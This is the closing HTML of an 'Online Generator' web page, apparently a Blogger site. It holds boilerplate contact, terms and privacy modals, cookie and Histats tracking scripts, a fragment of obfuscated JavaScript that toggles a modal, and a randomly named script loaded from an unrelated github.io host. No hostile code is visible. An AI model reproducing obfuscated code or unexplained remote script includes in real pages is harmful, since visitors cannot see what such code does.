_0x1d2494=_0x5bc884;document[_0x1d2494(0x1e9)]('term-id')['style'][_0x1d2494(0x1e6)]=_0x1d2494(0x207),document[_0x1d2494(0x1e9)](_0x1d2494(0x205))['classList']['remove'](_0x1d2494(0x1ff)),document[_0x1d2494(0x1e9)]('term-content-id')[_0x1d2494(0x1f1)][_0x1d2494(0x20b)](_0x1d2494(0x1e3));},0x320);}
</script>

<div class="privacy-form" id="contact-id" style="display:none">
    <div class="contact-content showin" id="contact-content-id">
      <span class="close-privacy" onclick="hidecontact()">�</span>
     <div class="bx-psn"><h3 style="padding:8px"><strong>Contact Us</strong></h3>
      <p style="padding-bottom:8px">You can reach our team by using this form</p>
      <input id="euid" class="inputnam" type="text" name="" placeholder="Your Email">
      <textarea id="message" name="message" rows="4" class="message" placeholder="Message" data-v-68a6aac8=""></textarea>
    <div class="showin" id="responEmial" style="display:none">
      <p style="padding:10px;">Thank you for contacting us, and we will respond to your message promptly.</p>
    </div><button class="bntnext" onclick="Esend()">Send</button>
    </div></div></div> 
  <div class="privacy-form " id="term-id" style="display:none">
    <div class="privacy-content showin" id="term-content-id"> 
      <span class="close-privacy" onclick="hideterm()">�</span>
     <div class="bx-psn">
      <h3 style="padding:8px"><strong>Terms and Conditions</strong></h3>
      <p>Welcome to Online Generator!</p>
      <p>These terms and conditions outline the rules and regulations for the use of Generator tools's Website, located at Online Generator.</p>
      <p>By accessing this website we assume you accept these terms and conditions. Do not continue to use Online Generator if you do not agree to take all of the terms and conditions stated on this page.</p>
      <p>The following terminology applies to these Terms and Conditions, Privacy Statement and Disclaimer Notice and all Agreements: "Client", "You" and "Your" refers to you, the person log on this website and compliant to the Company terms and conditions. "The Company", "Ourselves", "We", "Our" and "Us", refers to our Company. "Party", "Parties", or "Us", refers to both the Client and ourselves. All terms refer to the offer, acceptance and consideration of payment necessary to undertake the process of our assistance to the Client in the most appropriate manner for the express purpose of meeting the Client needs in respect of provision of the Company stated services, in accordance with and subject to, prevailing law of Netherlands. Any use of the above terminology or other words in the singular, plural, capitalization and/or he/she or they, are taken as interchangeable and therefore as referring to same.</p>
      <h3 style="padding:8px"><strong>Cookies</strong></h3>
      <p>We employ the use of cookies. By accessing Online Generator, you agreed to use cookies in agreement with the Generator tools's Privacy Policy. </p>
      <p>Most interactive websites use cookies to let us retrieve the user details for each visit. Cookies are used by our website to enable the functionality of certain areas to make it easier for people visiting our website. Some of our affiliate/advertising partners may also use cookies.</p>
      <h3 style="padding:8px"><strong>License</strong></h3>
      <p>Unless otherwise stated, Generator tools and/or its licensors own the intellectual property rights for all material on Online Generator. All intellectual property rights are reserved. You may access this from Online Generator for your own personal use subjected to restrictions set in these terms and conditions.</p>
      <p>You must not:</p>
      <ul>
          <li>Republish material from Online Generator</li>
          <li>Sell, rent or sub-license material from Online Generator</li>
          <li>Reproduce, duplicate or copy material from Online Generator</li>
          <li>Redistribute content from Online Generator</li>
      </ul>
      <p>This Agreement shall begin on the date hereof.</p>
      <p>Parts of this website offer an opportunity for users to post and exchange opinions and information in certain areas of the website. Generator tools does not filter, edit, publish or review Comments prior to their presence on the website. Comments do not reflect the views and opinions of Generator tools,its agents and/or affiliates. Comments reflect the views and opinions of the person who post their views and opinions. To the extent permitted by applicable laws, Generator tools shall not be liable for the Comments or for any liability, damages or expenses caused and/or suffered as a result of any use of and/or posting of and/or appearance of the Comments on this website.</p>
      <p>Generator tools reserves the right to monitor all Comments and to remove any Comments which can be considered inappropriate, offensive or causes breach of these Terms and Conditions.</p>
      <p>You warrant and represent that:</p>
      <ul>
          <li>You are entitled to post the Comments on our website and have all necessary licenses and consents to do so;</li>
          <li>The Comments do not invade any intellectual property right, including without limitation copyright, patent or trademark of any third party;</li>
          <li>The Comments do not contain any defamatory, libelous, offensive, indecent or otherwise unlawful material which is an invasion of privacy</li>
          <li>The Comments will not be used to solicit or promote business or custom or present commercial activities or unlawful activity.</li>
      </ul>
      <p>You hereby grant Generator tools a non-exclusive license to use, reproduce, edit and authorize others to use, reproduce and edit any of your Comments in any and all forms, formats or media.</p>
      <h3 style="padding:8px"><strong>Hyperlinking to our Content</strong></h3>
      <p>The following organizations may link to our Website without prior written approval:</p>
      <ul>
          <li>Government agencies;</li>
          <li>Search engines;</li>
          <li>News organizations;</li>
          <li>Online directory distributors may link to our Website in the same manner as they hyperlink to the Websites of other listed businesses; and</li>
          <li>System wide Accredited Businesses except soliciting non-profit organizations, charity shopping malls, and charity fundraising groups which may not hyperlink to our Web site.</li>
      </ul>
      <p>These organizations may link to our home page, to publications or to other Website information so long as the link: (a) is not in any way deceptive; (b) does not falsely imply sponsorship, endorsement or approval of the linking party and its products and/or services; and (c) fits within the context of the linking party site.</p>
      <p>We may consider and approve other link requests from the following types of organizations:</p>
      <ul>
          <li>commonly-known consumer and/or business information sources;</li>
          <li>dot.com community sites;</li>
          <li>associations or other groups representing charities;</li>
          <li>online directory distributors;</li>
          <li>internet portals;</li>
          <li>accounting, law and consulting firms; and</li>
          <li>educational institutions and trade associations.</li>
      </ul>
      <p>We will approve link requests from these organizations if we decide that: (a) the link would not make us look unfavorably to ourselves or to our accredited businesses; (b) the organization does not have any negative records with us; (c) the benefit to us from the visibility of the hyperlink compensates the absence of Generator tools; and (d) the link is in the context of general resource information.</p>
      <p>These organizations may link to our home page so long as the link: (a) is not in any way deceptive; (b) does not falsely imply sponsorship, endorsement or approval of the linking party and its products or services; and (c) fits within the context of the linking party site.</p>
      <p>If you are one of the organizations listed in paragraph 2 above and are interested in linking to our website, you must inform us by sending an e-mail to Generator tools. Please include your name, your organization name, contact information as well as the URL of your site, a list of any URLs from which you intend to link to our Website, and a list of the URLs on our site to which you would like to link. Wait 2-3 weeks for a response.</p>
      <p>Approved organizations may hyperlink to our Website as follows:</p>
      <ul>
          <li>By use of our corporate name; or</li>
          <li>By use of the uniform resource locator being linked to; or</li>
          <li>By use of any other description of our Website being linked to that makes sense within the context and format of content on the linking party site.</li>
      </ul>
      <p>No use of Generator tools's logo or other artwork will be allowed for linking absent a trademark license agreement.</p>
      <h3><strong>iFrames</strong></h3>
      <p>Without prior approval and written permission, you may not create frames around our Webpages that alter in any way the visual presentation or appearance of our Website.</p>
      <h3 style="padding:8px"><strong>Content Liability</strong></h3>
      <p>We shall not be hold responsible for any content that appears on your Website. You agree to protect and defend us against all claims that is rising on your Website. No link(s) should appear on any Website that may be interpreted as libelous, obscene or criminal, or which infringes, otherwise violates, or advocates the infringement or other violation of, any third party rights.</p>
      <h3 style="padding:8px"><strong>Your Privacy</strong></h3>
      <p>Please read Privacy Policy</p>
      <h3 style="padding:8px"><strong>Reservation of Rights</strong></h3>
      <p>We reserve the right to request that you remove all links or any particular link to our Website. You approve to immediately remove all links to our Website upon request. We also reserve the right to amen these terms and conditions and linking policy at any time. By continuously linking to our Website, you agree to be bound to and follow these linking terms and conditions.</p>
      <h3 style="padding:8px"><strong>Removal of links from our website</strong></h3>
      <p>If you find any link on our Website that is offensive for any reason, you are free to contact and inform us any moment. We will consider requests to remove links but we are not obligated to or so or to respond to you directly.</p>
      <p>We do not ensure that the information on this website is correct, we do not warrant its completeness or accuracy; nor do we promise to ensure that the website remains available or that the material on the website is kept up to date.</p>
      <h3 style="padding:8px"><strong>Disclaimer</strong></h3>
      <p>To the maximum extent permitted by applicable law, we exclude all representations, warranties and conditions relating to our website and the use of this website. Nothing in this disclaimer will:</p>
      <ul>
          <li>limit or exclude our or your liability for death or personal injury;</li>
          <li>limit or exclude our or your liability for fraud or fraudulent misrepresentation;</li>
          <li>limit any of our or your liabilities in any way that is not permitted under applicable law; or</li>
          <li>exclude any of our or your liabilities that may not be excluded under applicable law.</li>
      </ul>
      <p>The limitations and prohibitions of liability set in this Section and elsewhere in this disclaimer: (a) are subject to the preceding paragraph; and (b) govern all liabilities arising under the disclaimer, including liabilities arising in contract, in tort and for breach of statutory duty.</p>
      <p>As long as the website and the information and services on the website are provided free of charge, we will not be liable for any loss or damage of any nature.</p>
    </div></div></div>
  <div class="privacy-form " id="privacy-id" style="display:none">
    <div class="privacy-content showin" id="privacy-content-id">
      <span class="close-privacy" onclick="hideprivacy()">�</span>
     <div class="bx-psn">
      <h3 style="padding:8px">Privacy Policy</h3>
      <p>At Online Generator, accessible from Online Generator, one of our main priorities is the privacy of our visitors. This Privacy Policy document contains types of information that is collected and recorded by Online Generator and how we use it.</p>
      <p>If you have additional questions or require more information about our Privacy Policy, do not hesitate to contact us.</p>
      <p>This Privacy Policy applies only to our online activities and is valid for visitors to our website with regards to the information that they shared and/or collect in Online Generator. This policy is not applicable to any information collected offline or via channels other than this website.</p>
      <h3 style="padding:8px">Consent</h3>
      <p>By using our website, you hereby consent to our Privacy Policy and agree to its terms.</p>
      <h3 style="padding:8px">Information we collect</h3>
      <p>The personal information that you are asked to provide, and the reasons why you are asked to provide it, will be made clear to you at the point we ask you to provide your personal information.</p>
      <p>If you contact us directly, we may receive additional information about you such as your name, email address, phone number, the contents of the message and/or attachments you may send us, and any other information you may choose to provide.</p>
      <p>When you register for an Account, we may ask for your contact information, including items such as name, company name, address, email address, and telephone number.</p>
      <h3 style="padding:8px">How we use your information</h3>
      <p>We use the information we collect in various ways, including to:</p>
      <ul>
      <li>Provide, operate, and maintain our website</li>
      <li>Improve, personalize, and expand our website</li>
      <li>Understand and analyze how you use our website</li>
      <li>Develop new products, services, features, and functionality</li>
      <li>Communicate with you, either directly or through one of our partners, including for customer service, to provide you with updates and other information relating to the website, and for marketing and promotional purposes</li>
      <li>Send you emails</li>
      <li>Find and prevent fraud</li>
      </ul>
      <h3 style="padding:8px">Log Files</h3>
      <p>Online Generator follows a standard procedure of using log files. These files log visitors when they visit websites. All hosting companies do this and a part of hosting services' analytics. The information collected by log files include internet protocol (IP) addresses, browser type, Internet Service Provider (ISP), date and time stamp, referring/exit pages, and possibly the number of clicks. These are not linked to any information that is personally identifiable. The purpose of the information is for analyzing trends, administering the site, tracking users' movement on the website, and gathering demographic information.</p>
      <h3 style="padding:8px">Advertising Partners Privacy Policies</h3>
      <p>You may consult this list to find the Privacy Policy for each of the advertising partners of Online Generator.</p>
      <p>Third-party ad servers or ad networks uses technologies like cookies, JavaScript, or Web Beacons that are used in their respective advertisements and links that appear on Online Generator, which are sent directly to users' browser. They automatically receive your IP address when this occurs. These technologies are used to measure the effectiveness of their advertising campaigns and/or to personalize the advertising content that you see on websites that you visit.</p>
      <p>Note that Online Generator has no access to or control over these cookies that are used by third-party advertisers.</p>
      <h3 style="padding:8px">Third Party Privacy Policies</h3>
      <p>Online Generator's Privacy Policy does not apply to other advertisers or websites. Thus, we are advising you to consult the respective Privacy Policies of these third-party ad servers for more detailed information. It may include their practices and instructions about how to opt-out of certain options. </p>
      <p>You can choose to disable cookies through your individual browser options. To know more detailed information about cookie management with specific web browsers, it can be found at the browsers' respective websites.</p>
      <h3 style="padding:8px">CCPA Privacy Rights (Do Not Sell My Personal Information)</h3>
      <p>Under the CCPA, among other rights, California consumers have the right to:</p>
      <p>Request that a business that collects a consumer's personal data disclose the categories and specific pieces of personal data that a business has collected about consumers.</p>
      <p>Request that a business delete any personal data about the consumer that a business has collected.</p>
      <p>Request that a business that sells a consumer's personal data, not sell the consumer's personal data.</p>
      <p>If you make a request, we have one month to respond to you. If you would like to exercise any of these rights, please contact us.</p>
      <h3 style="padding:8px">GDPR Data Protection Rights</h3>
      <p>We would like to make sure you are fully aware of all of your data protection rights. Every user is entitled to the following:</p>
      <p>The right to access. You have the right to request copies of your personal data. We may charge you a small fee for this service.</p>
      <p>The right to rectification. You have the right to request that we correct any information you believe is inaccurate. You also have the right to request that we complete the information you believe is incomplete.</p>
      <p>The right to erasure. You have the right to request that we erase your personal data, under certain conditions.</p>
      <p>The right to restrict processing. You have the right to request that we restrict the processing of your personal data, under certain conditions.</p>
      <p>The right to object to processing. You have the right to object to our processing of your personal data, under certain conditions.</p>
      <p>The right to data portability. You have the right to request that we transfer the data that we have collected to another organization, or directly to you, under certain conditions.</p>
      <p>If you make a request, we have one month to respond to you. If you would like to exercise any of these rights, please contact us.</p>
      <h3 style="padding:8px">Children's Information</h3>
      <p>Another part of our priority is adding protection for children while using the internet. We encourage parents and guardians to observe, participate in, and/or monitor and guide their online activity.</p>
      <p>Online Generator does not knowingly collect any Personal Identifiable Information from children under the age of 13. If you think that your child provided this kind of information on our website, we strongly encourage you to contact us immediately and we will do our best efforts to promptly remove such information from our records.</p>
</div></div></div>



<!-- 'It is your responsibility to notify your visitors about cookies used and data collected on your blog. Blogger makes a standard notification available for you to use on your blog, and you can customise it or replace it with your own notice. See http://www.blogger.com/go/cookiechoices for more details.' -->
<script src="https://lmctplus1.github.io/kecro/kBP6mAz6TV6Y.js" defer=""></script>
<script>
  document.addEventListener('DOMContentLoaded', function(event) {
    window.cookieChoices && cookieChoices.showCookieConsentBar && cookieChoices.showCookieConsentBar(
        (window.cookieOptions && cookieOptions.msg) || 'This site uses cookies from Google to deliver its services and to analyse traffic. Your IP address and user agent are shared with Google, together with performance and security metrics, to ensure quality of service, generate usage statistics and to detect and address abuse.',
        (window.cookieOptions && cookieOptions.close) || 'Got it',
        (window.cookieOptions && cookieOptions.learn) || 'Learn more',
        (window.cookieOptions && cookieOptions.link) || 'https://www.blogger.com/go/blogspot-cookies');
  });
</script>




<script type="text/javascript">var _Hasync= _Hasync|| [];

_Hasync.push(['Histats.start', '1,4884300,4,0,0,0,00010000']);

_Hasync.push(['Histats.fasi', '1']);

_Hasync.push(['Histats.track_hits', '']);

(function() {

var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;

hs.src = ('//s10.histats.com/js15_as.js');

(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);

})();</script>

<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4884300&101" alt="web hit counter" border="0"></a></noscript>

<!-- Histats.com  END  --></div></body></html><!-- Histats.com  START  (aync)-->
